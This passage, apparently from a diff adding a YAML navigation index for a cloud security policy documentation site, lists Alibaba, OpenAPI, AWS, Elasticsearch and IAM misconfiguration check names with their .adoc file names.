bucket has versioning disabled + file: ensure-alibaba-cloud-oss-bucket-has-versioning-enabled.adoc + - name: Alibaba Cloud OSS bucket is not encrypted with Customer Master Key + file: ensure-alibaba-cloud-oss-bucket-is-encrypted-with-customer-master-key.adoc + - name: Alibaba Cloud OSS bucket accessible to public + file: ensure-alibaba-cloud-oss-bucket-is-not-accessible-to-public.adoc + - name: Alibaba Cloud RDS instance 
has log_disconnections disabled + file: ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled-1.adoc + - name: Alibaba Cloud KMS Key is disabled + file: ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc + - name: Alibaba Cloud RDS instance does not have log_duration enabled + file: ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc + - name: Alibaba Cloud RDS instance is not set to perform auto upgrades for minor versions + file: ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc + - name: Alibaba Cloud RDS log audit is disabled + file: ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc + - name: Alibaba RDS instance has log_connections disabled + file: ensure-alibaba-rds-instance-has-log-connections-enabled.adoc +- name: Alibaba IAM Policies + dir: alibaba-iam-policies + topics: + - name: Alibaba IAM Policies + file: alibaba-iam-policies.adoc + - name: Alibaba Cloud RAM password policy maximal login attempts is more than 4 + file: ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc + - name: Alibaba Cloud RAM does not enforce MFA + file: ensure-alibaba-cloud-ram-enforces-mfa.adoc + - name: Alibaba Cloud RAM password policy does not expire in 90 days + file: ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc + - name: Alibaba Cloud RAM password policy does not prevent password reuse + file: ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc + - name: Alibaba Cloud RAM password policy does not have a lowercase character + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc + - name: Alibaba Cloud RAM password policy does not have a number + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc + - name: Alibaba Cloud RAM password policy does not have a symbol + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc + 
- name: Alibaba Cloud RAM password policy does not have an uppercase character + file: ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc + - name: Alibaba Cloud RAM password policy does not have a minimum of 14 characters + file: ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc +- name: Alibaba Kubernetes Policies + dir: alibaba-kubernetes-policies + topics: + - name: Alibaba Kubernetes Policies + file: alibaba-kubernetes-policies.adoc + - name: Alibaba Cloud Kubernetes does not install plugin Terway or Flannel to support standard policies + file: ensure-alibaba-cloud-kubernetes-installs-plugin-terway-or-flannel-to-support-standard-policies.adoc + - name: Alibaba Cloud Kubernetes node pools are not set to auto repair + file: ensure-alibaba-cloud-kubernetes-node-pools-are-set-to-auto-repair.adoc +- name: Alibaba Logging Policies + dir: alibaba-logging-policies + topics: + - name: Alibaba Logging Policies + file: alibaba-logging-policies.adoc + - name: Alibaba Cloud Action Trail Logging is not enabled for all events + file: ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc + - name: Alibaba Cloud Action Trail Logging is not enabled for all regions + file: ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc + - name: Alibaba Cloud OSS bucket has access logging enabled + file: ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc + - name: Alibaba Cloud RDS Instance SQL Collector Retention Period is less than 180 + file: ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc + - name: Alibaba Cloud Transparent Data Encryption is disabled on instance + file: ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc +- name: Alibaba Networking Policies + dir: alibaba-networking-policies + topics: + - name: Alibaba Networking Policies + file: alibaba-networking-policies.adoc + - name: Alibaba cloud ALB ACL 
does not restrict public access + file: ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc + - name: Alibaba Cloud API Gateway API Protocol does not use HTTPS + file: ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc + - name: Alibaba Cloud Cypher Policy is not secured + file: ensure-alibaba-cloud-cypher-policy-is-secured.adoc + - name: Alibaba Cloud MongoDB instance is public + file: ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc + - name: Alibaba Cloud Mongodb instance does not use SSL + file: ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc + - name: Alibaba Cloud MongoDB is not deployed inside a VPC + file: ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc + - name: Alibaba Cloud RDS instance does not use SSL + file: ensure-alibaba-cloud-rds-instance-uses-ssl.adoc + - name: Alibaba Cloud Security group allow internet traffic to SSH port (22) + file: ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc + - name: Alibaba Cloud Security group allow internet traffic to RDP port (3389) + file: ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc +--- +kind: chapter +name: API Policies +dir: api-policies +topics: +- name: API Policies + file: api-policies.adoc +- name: OpenAPI Policies + dir: openapi-policies + topics: + - name: OpenAPI Policies + file: openapi-policies.adoc + - name: OpenAPI If the security scheme is not of type 'oauth2', the array value must be empty + file: ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc + - name: OpenAPI Security object for operations, if defined, must define a security scheme, otherwise it should be considered an error + file: ensure-that-security-operations-is-not-empty.adoc + - name: OpenAPI Security requirement not defined in the security definitions + file: ensure-that-security-requirement-defined-in-securitydefinitions.adoc + - name: Cleartext credentials over unencrypted channel 
should not be accepted for the operation + file: ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc + - name: OpenAPI Security Definitions Object should be set and not empty + file: ensure-that-securitydefinitions-is-defined-and-not-empty.adoc + - name: OpenAPI Security object needs to have defined rules in its array and rules should be defined in the securityScheme + file: ensure-that-the-global-security-field-has-rules-defined.adoc +--- +kind: chapter +name: AWS Policies +dir: aws-policies +topics: +- name: AWS Policies + file: aws-policies.adoc +- name: AWS General Policies + dir: aws-general-policies + topics: + - name: AWS General Policies + file: aws-general-policies.adoc + - name: Autoscaling groups did not supply tags to launch configurations + file: autoscaling-groups-should-supply-tags-to-launch-configurations.adoc + - name: AWS Image Builder component not encrypted using Customer Managed Key + file: bc-aws-general-100.adoc + - name: AWS fx ontap file system not encrypted using Customer Managed Key + file: ensure-fx-ontap-file-system-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS MQBroker audit logging is disabled + file: ensure-aws-mqbroker-audit-logging-is-enabled.adoc + - name: AWS S3 Object Copy not encrypted using Customer Managed Key + file: bc-aws-general-101.adoc + - name: AWS Doc DB not encrypted using Customer Managed Key + file: bc-aws-general-102.adoc + - name: AWS EBS Snapshot Copy not encrypted using Customer Managed Key + file: bc-aws-general-103.adoc + - name: AWS Elastic File System (EFS) is not encrypted using Customer Managed Key + file: bc-aws-general-104.adoc + - name: AWS Kinesis streams encryption is using default KMS keys instead of Customer's Managed Master Keys + file: bc-aws-general-105.adoc + - name: AWS S3 bucket Object not encrypted using Customer Managed Key + file: bc-aws-general-106.adoc + - name: AWS Sagemaker domain not encrypted using Customer Managed Key 
+ file: bc-aws-general-107.adoc + - name: AWS EBS Volume not encrypted using Customer Managed Key + file: bc-aws-general-109.adoc + - name: AWS lustre file system not configured with CMK key + file: bc-aws-general-110.adoc + - name: AWS Elasticache replication group not configured with CMK key + file: bc-aws-general-111.adoc + - name: AWS Kinesis streams are not encrypted using Server Side Encryption + file: bc-aws-general-22.adoc + - name: DAX is not securely encrypted at rest + file: bc-aws-general-23.adoc + - name: ECR image tags are not immutable + file: bc-aws-general-24.adoc + - name: AWS resources that support tags do not have Tags + file: bc-aws-general-26.adoc + - name: AWS CloudFront web distribution with AWS Web Application Firewall (AWS WAF) service disabled + file: bc-aws-general-27.adoc + - name: DocumentDB is not encrypted at rest + file: bc-aws-general-28.adoc + - name: Athena Database is not encrypted at rest + file: bc-aws-general-29.adoc + - name: CodeBuild project encryption is disabled + file: bc-aws-general-30.adoc + - name: AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2) + file: bc-aws-general-31.adoc + - name: MSK cluster encryption at rest and in transit is not enabled + file: bc-aws-general-32.adoc + - name: Athena workgroup does not prevent disabling encryption + file: bc-aws-general-33.adoc + - name: Glue Data Catalog encryption is not enabled + file: bc-aws-general-37.adoc + - name: Not all data stored in Aurora is securely encrypted at rest + file: bc-aws-general-38.adoc + - name: EFS volumes in ECS task definitions do not have encryption in transit enabled + file: bc-aws-general-39.adoc + - name: AWS SageMaker endpoint not configured with data encryption at rest using KMS key + file: bc-aws-general-40.adoc + - name: AWS Glue security configuration encryption is not enabled + file: bc-aws-general-41.adoc + - name: Neptune cluster instance is publicly available + file: bc-aws-general-42.adoc + - name: AWS Load 
Balancer is not using TLS 1.2
+    file: bc-aws-general-43.adoc
+  - name: AWS Kinesis Video Stream not encrypted using Customer Managed Key
+    file: bc-aws-general-97.adoc
+  - name: AWS FSX Windows filesystem not encrypted using Customer Managed Key
+    file: bc-aws-general-99.adoc
+  - name: Postgres RDS does not have Query Logging enabled
+    file: bc-aws-logging-32.adoc
+  - name: Deletion protection disabled for load balancer
+    file: bc-aws-networking-62.adoc
+  - name: AWS QLDB ledger deletion protection is disabled
+    file: bc-aws-storage-1.adoc
+  - name: AWS API Gateway caching is disabled
+    file: ensure-api-gateway-caching-is-enabled.adoc
+  - name: AWS ACM certificates do not have logging preference
+    file: ensure-aws-acm-certificates-has-logging-preference.adoc
+  - name: AWS all data stored in the Elasticsearch domain is not encrypted using a Customer Managed Key (CMK)
+    file: ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc
+  - name: AWS AMI copying does not use a Customer Managed Key (CMK)
+    file: ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc
+  - name: AWS AMI launch permissions are not limited
+    file: ensure-aws-ami-launch-permissions-are-limited.adoc
+  - name: AWS AMIs are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)
+    file: ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc
+  - name: AWS API deployments do not enable Create before Destroy
+    file: ensure-aws-api-deployments-enable-create-before-destroy.adoc
+  - name: AWS API Gateway caching is disabled
+    file: ensure-aws-api-gateway-caching-is-enabled.adoc
+  - name: AWS API Gateway Domain does not use a modern security policy
+    file: ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc
+  - name: Ensure AWS API gateway enables Create before Destroy
+    file: ensure-aws-api-gateway-enables-create-before-destroy.adoc
+  - name: AWS API Gateway method settings do not enable caching
+    file: ensure-aws-api-gateway-method-settings-enable-caching.adoc
+  - name: AWS App Flow connector profile does not use Customer Managed Keys (CMKs)
+    file: ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc
+  - name: AWS App Flow flow does not use Customer Managed Keys (CMKs)
+    file: ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc
+  - name: AWS Appsync API Cache is not encrypted at rest
+    file: ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc
+  - name: AWS Appsync API Cache is not encrypted in transit
+    file: ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc
+  - name: AWS AppSync has field-level logs disabled
+    file: ensure-aws-appsync-has-field-level-logs-enabled.adoc
+  - name: AWS AppSync is not protected by WAF
+    file: ensure-aws-appsync-is-protected-by-waf.adoc
+  - name: AWS AppSync's logging is disabled
+    file: ensure-aws-appsyncs-logging-is-enabled.adoc
+  - name: AWS Lambda function URL AuthType set to NONE
+    file: ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc
+  - name: AWS Batch Job is defined as a privileged container
+    file: ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc
+  - name: AWS MQBroker audit logging is disabled
+    file: ensure-aws-cloudfront-attached-wafv2-webacl-is-configured-with-amr-for-log4j-vulnerability.adoc
+  - name: AWS Cloudfront distribution is disabled
+    file: ensure-aws-cloudfront-distribution-is-enabled.adoc
+  - name: AWS CloudFront response header policy does not enforce Strict Transport Security
+    file: ensure-aws-cloudfront-response-header-policy-enforces-strict-transport-security.adoc
+  - name: AWS Cloudsearch does not use HTTPS
+    file: ensure-aws-cloudsearch-uses-https.adoc
+  - name: AWS Cloudsearch does not use the latest Transport Layer Security (TLS)
+    file: ensure-aws-cloudsearch-uses-the-latest-transport-layer-security-tls-1.adoc
+  - name: AWS CloudTrail does not define an SNS Topic
+    file: ensure-aws-cloudtrail-defines-an-sns-topic.adoc
+  - name: AWS CloudTrail logging is disabled
+    file: ensure-aws-cloudtrail-logging-is-enabled.adoc
+  - name: AWS cluster logging is not encrypted using a Customer Managed Key (CMK)
+    file: ensure-aws-cluster-logging-is-encrypted-using-a-customer-managed-key-cmk.adoc
+  - name: AWS Code Artifact Domain is not encrypted by KMS using a Customer Managed Key (CMK)
+    file: ensure-aws-code-artifact-domain-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc
+  - name: AWS Codecommit branch changes have fewer than 2 approvals
+    file: ensure-aws-codecommit-branch-changes-have-at-least-2-approvals.adoc
+  - name: AWS Codecommit is not associated with an approval rule
+    file: ensure-aws-codecommit-is-associated-with-an-approval-rule.adoc
+  - name: AWS CodePipeline artifactStore is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)
+    file: ensure-aws-codepipeline-artifactstore-is-not-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
+  - name: AWS Config must record all possible resources
+    file: ensure-aws-config-must-record-all-possible-resources.adoc
+  - name: AWS Config Recording is disabled
+    file: ensure-aws-config-recorder-is-enabled-to-record-all-supported-resources.adoc
+  - name: AWS copied AMIs are not encrypted
+    file: ensure-aws-copied-amis-are-encrypted.adoc
+  - name: AWS DAX cluster endpoint does not use TLS (Transport Layer Security)
+    file: ensure-aws-dax-cluster-endpoint-uses-transport-layer-security-tls.adoc
+  - name: AWS DB instance does not get all minor upgrades automatically
+    file: ensure-aws-db-instance-gets-all-minor-upgrades-automatically.adoc
+  - name: AWS DLM cross-region events are not encrypted with a Customer Managed Key (CMK)
+    file: ensure-aws-dlm-cross-region-events-are-encrypted-with-a-customer-managed-key-cmk.adoc
+  - name: AWS DLM cross-region events are not encrypted
+    file: ensure-aws-dlm-cross-region-events-are-encrypted.adoc
+  - name: AWS DLM cross-region schedules are not encrypted using a Customer Managed Key (CMK)
+    file: ensure-aws-dlm-cross-region-schedules-are-encrypted-using-a-customer-managed-key-cmk.adoc
+  - name: AWS DLM cross-region schedules are not encrypted
+    file: ensure-aws-dlm-cross-region-schedules-are-encrypted.adoc
+  - name: AWS DMS instance does not receive all minor updates automatically
+    file: ensure-aws-dms-instance-receives-all-minor-updates-automatically.adoc
+  - name: AWS EBS Volume is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)
+    file: ensure-aws-ebs-volume-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
+  - name: AWS ECS Cluster does not enable logging of ECS Exec
+    file: ensure-aws-ecs-cluster-enables-logging-of-ecs-exec.adoc
+  - name: AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to disabled
+    file: ensure-aws-elasticache-redis-cluster-with-multi-az-automatic-failover-feature-set-to-enabled.adoc
+  - name: AWS Elasticsearch domain does not use an updated TLS policy
+    file: ensure-aws-elasticsearch-domain-uses-an-updated-tls-policy.adoc
+  - name: AWS FSX openzfs is not encrypted by AWS' Key Management Service (KMS) using a Customer Managed Key (CMK)
+    file: ensure-aws-fsx-openzfs-file-system-is-encrypted-by-aws-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
+  - name: AWS Glue component is not associated with a security configuration
+    file: ensure-aws-glue-component-is-associated-with-a-security-configuration.adoc
+  - name: AWS GuardDuty detector is not enabled
+    file: ensure-aws-guardduty-detector-is-enabled.adoc
+  - name: AWS Image Builder Distribution Configuration is not encrypting AMI by Key Management Service (KMS) using a Customer Managed Key (CMK)
+    file: ensure-aws-image-builder-distribution-configuration-is-encrypting-ami-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
+  - name: AWS Image Recipe EBS Disks are not encrypted using a Customer Managed Key (CMK)
+    file: ensure-aws-image-recipe-ebs-disk-are-encrypted-using-a-customer-managed-key-cmk.adoc
+  - name: AWS Kendra index Server side encryption does not use Customer Managed Keys (CMKs)
+    file: ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks-1.adoc
+  - name: AWS HTTP and HTTPS target groups do not define health check
+    file: ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks.adoc
+  - name: AWS Key Management Service (KMS) key is disabled
+    file: ensure-aws-key-management-service-kms-key-is-enabled.adoc
+  - name: AWS Keyspace Table does not use Customer Managed Keys (CMKs)
+    file: ensure-aws-keyspace-table-uses-customer-managed-keys-cmks.adoc
+  - name: AWS Kinesis Firehose Delivery Streams are not encrypted with CMK
+    file: ensure-aws-kinesis-firehose-delivery-streams-are-encrypted-with-cmk.adoc
+  - name: AWS Kinesis Firehose's delivery stream is not encrypted
+    file: ensure-aws-kinesis-firehoses-delivery-stream-is-encrypted.adoc
+  - name: AWS MemoryDB data is not encrypted in transit
+    file: ensure-aws-memorydb-data-is-encrypted-in-transit.adoc
+  - name: AWS MemoryDB is not encrypted at rest by AWS' Key Management Service KMS using CMKs
+    file: ensure-aws-memorydb-is-encrypted-at-rest-by-aws-key-management-service-kms-using-cmks.adoc
+  - name: AWS MQBroker is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK)
+    file: ensure-aws-mqbroker-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
+  - name: AWS MQBroker version is not up to date
+    file: ensure-aws-mqbroker-version-is-up-to-date.adoc
+  - name: AWS MQBroker's minor version updates are disabled
+    file: ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc
+  - name: AWS MWAA environment has scheduler logs disabled
+    file: ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc
+  - name: AWS MWAA environment has webserver logs disabled
+    file: ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc
+  - name: AWS MWAA environment has worker logs disabled
+    file: ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc
+  - name: AWS RDS Cluster activity streams are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)
+    file: ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc
+  - name: AWS RDS DB snapshot does not use Customer Managed Keys (CMKs)
+    file: ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc
+  - name: AWS RDS PostgreSQL exposed to local file read vulnerability
+    file: ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc
+  - name: AWS RDS does not use a modern CaCert
+    file: ensure-aws-rds-uses-a-modern-cacert.adoc
+  - name: AWS replicated backups are not encrypted at rest by Key Management Service (KMS) using a Customer Managed Key (CMK)
+    file: ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc
+  - name: AWS SSM Parameter is not encrypted
+    file: ensure-aws-ssm-parameter-is-encrypted.adoc
+  - name: AWS Terraform sends SSM secrets to untrusted domains over HTTP
+    file: ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc
+  - name: Backup Vault is not encrypted at rest using KMS CMK
+    file: ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc
+  - name: DocDB does not have audit logs enabled
+    file: ensure-docdb-has-audit-logs-enabled.adoc
+  - name: DynamoDB point in time recovery is not enabled for global tables
+    file: ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc
+  - name: AWS EBS volume region with encryption is disabled
+    file: ensure-ebs-default-encryption-is-enabled.adoc
+  - name: AWS EMR cluster is not configured with SSE KMS for data at rest encryption (Amazon S3 with EMRFS)
+    file: ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc
+  - name: Glacier Vault access policy is public and not restricted to specific services or principals
+    file: ensure-glacier-vault-access-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc
+  - name: Ensure Glue component has a security configuration associated
+    file: ensure-glue-component-has-a-security-configuration-associated.adoc
+  - name: GuardDuty is not enabled to specific org/region
+    file: ensure-guardduty-is-enabled-to-specific-orgregion.adoc
+  - name: AWS Postgres RDS has Query Logging disabled
+    file: ensure-postgres-rds-has-query-logging-enabled.adoc
+  - name: Provisioned resources are manually modified
+    file: ensure-provisioned-resources-are-not-manually-modified.adoc
+  - name: QLDB ledger permissions mode is not set to STANDARD
+    file: ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc
+  - name: AWS Redshift does not have require_ssl configured
+    file: ensure-redshift-uses-ssl.adoc
+  - name: Route53 A Record does not have Attached Resource
+    file: ensure-route53-a-record-has-an-attached-resource.adoc
+  - name: Session Manager data is not encrypted in transit
+    file: ensure-session-manager-data-is-encrypted-in-transit.adoc
+  - name: Deletion protection disabled for load balancer
+    file: ensure-session-manager-logs-are-enabled-and-encrypted.adoc
+  - name: SNS topic policy is public and access is not restricted to specific services or principals
+    file: ensure-sns-topic-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc
+  - name: SQS queue policy is public and access is not restricted to specific services or principals
+    file: ensure-sqs-queue-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc
+  - name: Amazon ElastiCache Redis clusters do not have automatic backup turned on
+    file: ensure-that-amazon-elasticache-redis-clusters-have-automatic-backup-turned-on.adoc
+  - name: Athena Workgroup is not encrypted
+    file: ensure-that-athena-workgroup-is-encrypted.adoc
+  - name: DynamoDB Tables do not have Auto Scaling enabled
+    file: ensure-that-auto-scaling-is-enabled-on-your-dynamodb-tables.adoc
+  - name: AWS Lambda function is not configured for a DLQ
+    file: ensure-that-aws-lambda-function-is-configured-for-a-dead-letter-queue-dlq.adoc
+  - name: AWS Lambda function is not configured for function-level concurrent execution Limit
+    file: ensure-that-aws-lambda-function-is-configured-for-function-level-concurrent-execution-limit.adoc
+  - name: AWS Lambda Function is not assigned to access within VPC
+    file: ensure-that-aws-lambda-function-is-configured-inside-a-vpc-1.adoc
+  - name: AWS CloudWatch Log groups encrypted using default encryption key instead of KMS CMK
+    file: ensure-that-cloudwatch-log-group-is-encrypted-by-kms.adoc
+  - name: CodeBuild projects are not encrypted
+    file: ensure-that-codebuild-projects-are-encrypted-1.adoc
+  - name: Unencrypted DynamoDB Tables
+    file: ensure-that-dynamodb-tables-are-encrypted.adoc
+  - name: EBS does not have an AWS Backup backup plan
+    file: ensure-that-ebs-are-added-in-the-backup-plans-of-aws-backup.adoc
+  - name: EC2 EBS is not optimized
+    file: ensure-that-ec2-is-ebs-optimized.adoc
+  - name: Unencrypted ECR repositories
+    file: ensure-that-ecr-repositories-are-encrypted.adoc
+  - name: Amazon EFS does not have an AWS Backup backup plan
+    file: ensure-that-elastic-file-system-amazon-efs-file-systems-are-added-in-the-backup-plans-of-aws-backup.adoc
+  - name: Elastic load balancers do not use SSL Certificates provided by AWS Certificate Manager
+    file: ensure-that-elastic-load-balancers-uses-ssl-certificates-provided-by-aws-certificate-manager.adoc
+  - name: AWS EMR cluster is not configured with Kerberos Authentication
+    file: ensure-that-emr-clusters-have-kerberos-enabled.adoc
+  - name: Not all EBS volumes attached to EC2 instances are encrypted
+    file: ensure-that-only-encrypted-ebs-volumes-are-attached-to-ec2-instances.adoc
+  - name: AWS RDS cluster delete protection is disabled
+    file: ensure-that-rds-clusters-and-instances-have-deletion-protection-enabled.adoc
+  - name: RDS clusters do not have an AWS Backup backup plan
+    file: ensure-that-rds-clusters-has-backup-plan-of-aws-backup.adoc
+  - name: AWS RDS DB snapshot is not encrypted
+    file: ensure-that-rds-database-cluster-snapshot-is-encrypted-1.adoc
+  - name: Unencrypted RDS global clusters
+    file: ensure-that-rds-global-clusters-are-encrypted.adoc
+  - name: AWS RDS instance without Automatic Backup setting
+    file: ensure-that-rds-instances-have-backup-policy.adoc
+  - name: AWS Redshift Cluster not encrypted using Customer Managed Key
+    file: ensure-that-redshift-cluster-is-encrypted-by-kms.adoc
+  - name: Redshift clusters do not allow version upgrade by default
+    file: ensure-that-redshift-clusters-allow-version-upgrade-by-default.adoc
+  - name: S3 bucket cross-region replication disabled
+    file: ensure-that-s3-bucket-has-cross-region-replication-enabled.adoc
+  - name: S3 bucket lock configuration disabled
+    file: ensure-that-s3-bucket-has-lock-configuration-enabled-by-default.adoc
+  - name: S3 buckets are not encrypted with KMS
+    file: ensure-that-s3-buckets-are-encrypted-with-kms-by-default.adoc
+  - name: AWS Secrets Manager secret is not encrypted using KMS CMK
+    file: ensure-that-secrets-manager-secret-is-encrypted-using-kms.adoc
+  - name: Timestream database is not encrypted with KMS CMK
+    file: ensure-that-timestream-database-is-encrypted-with-kms-cmk.adoc
+  - name: Workspace root volumes are not encrypted
+    file: ensure-that-workspace-root-volumes-are-encrypted.adoc
+  - name: Workspace user volumes are not encrypted
+    file: ensure-that-workspace-user-volumes-are-encrypted.adoc
+  - name: AWS ElastiCache Redis cluster with in-transit encryption disabled (Replication group)
+    file: general-10.adoc
+  - name: AWS ElastiCache Redis cluster with Redis AUTH feature disabled
+    file: general-11.adoc
+  - name: EBS volumes do not have encrypted launch configurations
+    file: general-13.adoc
+  - name: AWS SageMaker notebook instance not configured with data encryption at rest using KMS key
+    file: general-14.adoc
+  - name: AWS SNS topic has SSE disabled
+    file: general-15.adoc
+  - name: AWS SQS Queue not configured with server side encryption
+    file: general-16-encrypt-sqs-queue.adoc
+  - name: AWS Elastic File System (EFS) with encryption for data at rest is disabled
+    file: general-17.adoc
+  - name: Neptune storage is not securely encrypted
+    file: general-18.adoc
+  - name: AWS Redshift instances are not encrypted
+    file: general-25.adoc
+  - name: AWS EBS volumes are not encrypted
+    file: general-3-encrypt-ebs-volume.adoc
+  - name: AWS RDS DB cluster encryption is disabled
+    file: general-4.adoc
+  - name: DynamoDB PITR is disabled
+    file: general-6.adoc
+  - name: Not all data stored in the EBS snapshot is securely encrypted
+    file: general-7.adoc
+  - name: RDS instances do not have Multi-AZ enabled
+    file: general-73.adoc
+  - name: ECR image scan on push is not enabled
+    file: general-8.adoc
+  - name: AWS ElastiCache Redis cluster with encryption for data at rest disabled
+    file: general-9.adoc
+  - name: AWS provisioned resources are manually modified
+    file: ensure-provisioned-resources-are-not-manually-modified.adoc
+- name: Elasticsearch Policies
+  dir: elastisearch-policies
+  topics:
+  - name: Elasticsearch Policies
+    file: elastisearch-policies.adoc
+  - name: AWS Elasticsearch domain Encryption for data at rest is disabled
+    file: elasticsearch-3-enable-encryptionatrest.adoc
+  - name: AWS Elasticsearch does not have node-to-node encryption enabled
+    file: elasticsearch-5.adoc
+  - name: AWS Elasticsearch domain is not configured with HTTPS
+    file: elasticsearch-6.adoc
+  - name: AWS Elasticsearch domain logging is not enabled
+    file: elasticsearch-7.adoc
+- name: AWS IAM Policies
+  dir: aws-iam-policies
+  topics:
+  - name: AWS IAM Policies
+    file: aws-iam-policies.adoc
+  - name: AWS IAM policy documents do not allow * (asterisk) as a statement's action
+    file: bc-aws-iam-43.adoc
+  - name: AWS IAM role allows all services or principals to be assumed
+    file: bc-aws-iam-44.adoc
+  - name: AWS IAM policy allows assume role permission across all services
+    file: bc-aws-iam-45.adoc
+  - name: AWS SQS queue access policy is overly permissive
+    file: bc-aws-iam-46.adoc
+  - name: AWS EC2 Instance IAM Role not enabled
+    file: ensure-an-iam-role-is-attached-to-ec2-instance.adoc
+  - name: IAM User has access to the console
+    file: ensure-an-iam-user-does-not-have-access-to-the-console-group.adoc
+  - name: AWS Cloudfront Distribution with S3 has Origin Access set to disabled
+    file: ensure-aws-cloudfromt-distribution-with-s3-have-origin-access-set-to-enabled.adoc
+  - name: Credentials exposure actions return credentials in an API response
+    file: ensure-iam-policies-do-not-allow-credentials-exposure.adoc
+  - name: Data exfiltration allowed without resource constraints
+    file: ensure-iam-policies-do-not-allow-data-exfiltration.adoc
+  - name: Resource exposure allows modification of policies and exposes resources
+    file: ensure-iam-policies-do-not-allow-permissions-management-resource-exposure-without-constraint.adoc
+  - name: Write access allowed without constraint
+    file: ensure-iam-policies-do-not-allow-write-access-without-constraint.adoc
+  - name: IAM policies allow privilege escalation
+    file: ensure-iam-policies-does-not-allow-privilege-escalation.adoc
+  - name: AWS KMS Key policy overly permissive
+    file: ensure-kms-key-policy-does-not-contain-wildcard-principal.adoc
+  - name: AWS RDS cluster not configured with IAM authentication
+    file: ensure-rds-cluster-has-iam-authentication-enabled.adoc
+  - name: RDS database does not have IAM authentication enabled
+    file: ensure-rds-database-has-iam-authentication-enabled.adoc
+  - name: AWS S3 buckets are accessible to any authenticated user
+    file: ensure-s3-bucket-does-not-allow-access-to-all-authenticated-users.adoc
+  - name: Not all IAM users are members of at least one IAM group
+    file: ensure-that-all-iam-users-are-members-of-at-least-one-iam-group.adoc
+  - name: IAM authentication for Amazon RDS clusters is disabled
+    file: ensure-that-an-amazon-rds-clusters-have-iam-authentication-enabled.adoc
+  - name: IAM groups do not include at least one IAM user
+    file: ensure-that-iam-groups-include-at-least-one-iam-user.adoc
+  - name: Respective logs of Amazon RDS are disabled
+    file: ensure-that-respective-logs-of-amazon-relational-database-service-amazon-rds-are-enabled.adoc
+  - name: AWS Execution Role ARN and Task Role ARN are different in ECS Task definitions
+    file: ensure-the-aws-execution-role-arn-and-task-role-arn-are-different-in-ecs-task-definitions.adoc
